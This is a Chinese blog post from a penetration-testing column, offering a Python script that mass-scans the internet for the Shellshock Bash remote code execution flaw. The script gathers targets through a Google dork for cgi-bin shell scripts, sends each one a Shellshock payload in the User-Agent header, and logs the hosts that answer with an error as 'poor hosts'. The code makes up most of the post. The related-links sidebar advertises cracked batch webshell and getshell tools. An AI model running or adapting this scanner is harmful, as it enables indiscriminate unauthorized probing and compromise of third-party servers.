Bash Shellshock(Bash远程代码执行)漏洞批量利用脚本

最新推荐文章于 2024-03-25 10:00:00 发布
最新推荐文章于 2024-03-25 10:00:00 发布
阅读量3w 收藏 2
点赞数 1
分类专栏: web渗透测试 安全编程
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u011721501/article/details/39577393
版权

Bash远程代码执行漏洞的威力确实要比心脏滴血大很多,但是影响范围不是很广泛,不过昨天的分析文章Bash远程代码执行漏洞分析中末尾提到了这个漏洞的批量问题。
其中最最简单的方法就是使用搜索引擎的hacking技术,这里我使用的Google Hacking语法结合Google API来进行链接的抓取。只不过在国内的话。。。。需要加代理。
程序中的代理是我本地的goagent代理,端口是8087。如何检测漏洞思路也很简单,我这里直接根据服务器返回码进行判断的。

思路就是以上这些,下面还是和往常一样,贴代码:

 

#coding=utf-8
import requests
import json
import sys
import threading
import socket
vul_res = []
class GoogleURLProvider():
	def __init__(self,pageCount,proxies):
		self.pageCount = pageCount #查询的页数
		self.keywords = r'inurl:cgi-bin filetype:sh'
		self.apiurl = "https://ajax.googleapis.com/ajax/services/search/web"
		self.proxies = proxies
	def getRequest(self,url):
		return requests.get(url,proxies=self.proxies,verify=False)

	def getUrls(self):
		ret_list = []
		tmp_list = []
		for x in xrange(0,self.pageCount):
			url = "{apiurl}?v=1.0&q={keywords}&rsz=8&start={pageCount}".format(apiurl=self.apiurl,keywords=self.keywords,pageCount=x)
			try:
				r = self.getRequest(url)	
				results = json.loads(r.text)
				if not results:
					continue
				infos = results['responseData']['results']
				if infos:
					for i in infos:
						tmp_list.append(i['url'])
			except Exception, e:
				continue
		ret_list = ret_list + tmp_list
		return ret_list

class BashRCEDetector():
	def __init__(self,urls):

		self.urls = urls
	def detector(self):
		global vul_res
		
		for x in self.urls:
			#多线程执行
			each = EachWorker(x)
			each.start()
			each.join()


'''线程工作类'''
class EachWorker(threading.Thread):
	def __init__(self,url):
		threading.Thread.__init__(self)
		self.url = url
	def run(self):
		global vul_res
		useragent_header = {
			'User-Agent':'''() { 1;}; echo 'eee'''
		}
		try:
			r = requests.get(self.url,headers = useragent_header,timeout=8)
			if r.status_code == 500:
				print "{url} has Bash RCE vulnerability".format(url=self.url)
				vul_res.append(self.url)
			else:
				pass
		except socket.timeout, e:
			pass
		except requests.exceptions.Timeout, e:
			pass
		except requests.exceptions.ConnectionError, e:
			pass


if __name__ == '__main__':
	print 'Powered by:Exploit QQ:739858341'
	print 'This is a program which you can use to scan the BashRCE vulnerability\nScanner working,please wait....'
	if len(sys.argv) != 2:
		print 'Usage:python BashRCEScanner <google pageCount>'
		sys.exit()
	#goagent proxy
	#在这里修改,加入你自己的代理即可使用
	proxies = {
	'http':"http://127.0.0.1:8087",
	'https':"http://127.0.0.1:8087"
	}
	url_res = []
	vul_guys = []
	urlgetter = GoogleURLProvider(int(sys.argv[1]),proxies)
	url_res = urlgetter.getUrls()

	bash_detector = BashRCEDetector(url_res)
	bash_detector.detector()
	if len(vul_res) == 0:
		print 'This group have no vulnerability'
	else:
		print 'Find %d poor host(s)' % len(vul_res)

 

 

 

 

 

运行截图:

 

 

隐形人真忙
关注
专栏目录
Getshell 网站漏洞批量检测工具破解后使用教程
07-26
Getshell网站漏洞批量检测工具破解后使用教程,运行软件,等待大概 3分钟左右软件才会启动。
批量执行linux漏洞,osCommerce 2.3.4.1-远程代码执行漏洞(附批量Getshell脚本)_白帽子技术/思路_i春秋社区-分享你的技术,为安全加点温度....
weixin_36192634的博客
05-13 632
0x01 前言好几天没有写了,前两天又去Boom了,差点没缓过来。今天在exploit-db逛看到一个洞,也是install的地方,想去利用上次那个远程数据库技巧来尝试下,发现这个洞根本用不到,不过新手可以学习下哈,也可以收藏下,因为有时候在ctf线下赛的时候官方会拿一些国外的程序给你玩,最近也在写python的漏洞利用工具,欢迎关注我的github。0x02 环境0x03 漏洞利用过程1.我们先...
命令执行漏洞详解
m0_55854679的博客
06-09 1294
文章目录漏洞原理 漏洞原理 用户输入的数据被当做系统命令进行执行代码执行:用户输入的数据当作后端代码执行 命令执行:用户输入的数据当作系统命令执行 <?php system('whoami')?> 其实一句话木马的本质就是一个命令执行漏洞。 .........
metinfo多个漏洞(可getshell)
kendyhj9999的专栏
05-21 2909
http://www.wooyun.org/bugs/wooyun-2010-043795
命令执行漏洞代码执行漏洞详解 一文了解命令执行漏洞代码执行漏洞
闵行小鱼塘
11-08 2836
本篇总结归纳命令执行漏洞(RCE)和代码执行漏洞
Linux Bash严重漏洞紧急修复方案
08-04
当用户通过Bash执行命令时,如果环境变量中包含了可执行脚本代码Bash会在解析这些变量时执行这些代码。攻击者可以通过设置这样的环境变量,利用这个漏洞执行任意命令,从而获取对系统的控制权。 【漏洞检测】 ...
shellshock:Bash中的太空射击游戏
05-24
标题 "shellshock:Bash中的太空射击游戏" 提到的是一个使用Bash shell语言开发的太空射击游戏。在本文中,我们将深入探讨这个独特的概念,了解如何在命令行环境中创建游戏,以及它如何利用Bash的功能来实现这一目标...
BASH(破壳漏洞)Redhat系统检测和修补
10-16
2014年,一个名为"Shellshock"的安全漏洞BASH中被发现,这被称为"BASH漏洞"或"破壳漏洞"。该漏洞允许攻击者通过环境变量执行恶意代码,从而获取系统控制权,对网络安全构成严重威胁。 **漏洞成因** BASH漏洞主要...
bash-4.4版本升级手册带安装包
09-03
在旧版本中,特别是低版本的Bash,存在一个名为“Shellshock”的安全漏洞,这个漏洞允许攻击者通过精心构造的环境变量来执行任意代码,对系统安全构成威胁。因此,及时升级到Bash 4.4或更高版本是非常必要的。 ### ...
redhat5.X、6.X BASH漏洞RPM补丁包(含教程)
10-05
这个漏洞的严重性在于,Bash在许多网络服务和脚本中被用作后端,因此,即使服务本身没有直接暴露shell,攻击者也能利用这个漏洞。破壳漏洞影响了多个版本的Bash,包括那些在Red Hat 5.x和6.x中的版本。 **RPM补丁包...
批量拿web shell工具【最新】
05-13 647
批量拿web shell工具【最新】内部有多个漏洞,可自动进行采集,自动爬虫多个引擎和友情链l,过狗一句话,轻松日出上千。
批量getshell exp编写
yyj1781572的博客
10-31 471
简介: 批量exp有什么用,例如某个大型cms【cms内容管理系统】如dedecms,WordPress、phpcms突然出了漏洞。各大安全src发布预警信息。 经过安全研究员摸索,poc很快地发布到网上,提供安全人员检测。网站管理员和运维人员也开始处理这次事件。 如果你的企业或任务上很多这样的网站,并不知道是否存在漏洞,总不能每个用手工区测试。编写批量检测这样就要提高效率,进行批量测试。
【网络安全】文件包含漏洞--通过日志投毒getshell
最新发布
xnxqwzy的博客
03-25 584
*博主昵称:跳楼梯企鹅博主主页面链接: ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ****博主专栏页面连接: ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** **接下来我将给各位同学划分一张学习计划表!
最新批量shell工具
dcdmer1211的博客
02-15 444
速度快,稳定性高,内存占用小扫到的百分之95都是一手的,可以更好的进行安全检测!更会不定时更新exp漏洞完全打破了目前网上所有的后缀扫描方式。
golang 远程批量执行shell_S2061远程代码执行漏洞复现及批量检测脚本(CVE202017530)...
weixin_30696613的博客
12-26 498
声明由于传播、利用此文所提供的信息或工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,博鸿科技安全服务中心以及文章作者不为此承担任何责任。博鸿科技安全服务中心拥有对此文章的修改和解释权。如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经博鸿科技安全服务中心允许,不得任意修改或者增减此文章内容,不得以任何方式将其用于商业目的。0x00 软件介绍strut...
〖工具〗log4Shell核弹级漏洞复现&Ladon批量检测
K8哥哥
12-18 4690
title: 〖工具〗log4Shell核弹级漏洞复现&Ladon批量检测 comments: true toc: true categories: exp tags: Log4j2 abbrlink: log4shell date: 2021-12-16 19:24:00 img: https://img-blog.csdnimg.cn/20210117163103552.jpg 漏洞简介 Apache Log4j2是一款优秀的Java日志框架。近日,漏洞银行安全团队注意到了Ap.
CVE-2018-8174漏洞获取shell复现
永远是少年
06-13 1141
今天继续给大家介绍渗透测试相关知识,本文主要内容是CVE-2018-8174漏洞获取shell复现。 一、CVE-2018-8174漏洞简介 二、利用漏洞生成网页 三、效果检验
Niu!简单漏洞的快速批量验证脚本
潇湘信安的博客
07-16 1075
追梦信安@W01fh4cker师傅新造的一个‬轮子,适‮利合‬用简‮的单‬漏洞批量扫描,例‮只如‬需要在url后面拼接一个payload,然‮根后‬据返‮包回‬判断关键字是‮存否‬在这种。
记录一次利用jboss任意生成代码漏洞批量获取shell
kelenwait的博客
03-31 726
记录一次利用jboss任意生成代码漏洞批量获取shell 漏洞简介 漏洞编号:CVE-2007-1036 此漏洞主要是由于JBoss中/jmx-console/HtmlAdaptor路径对外开放,并且没有任何身份验证机制,导致攻击者可以进入到jmx控制台,并在其中执行任何功能,该漏洞利用的是后台中jboss.admin -> DeploymentFileRepository -> store()方法,通过向四个参数传入信息,可上传shell。 渗透步骤 搭建或者寻找存在jboss的主机 可通
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值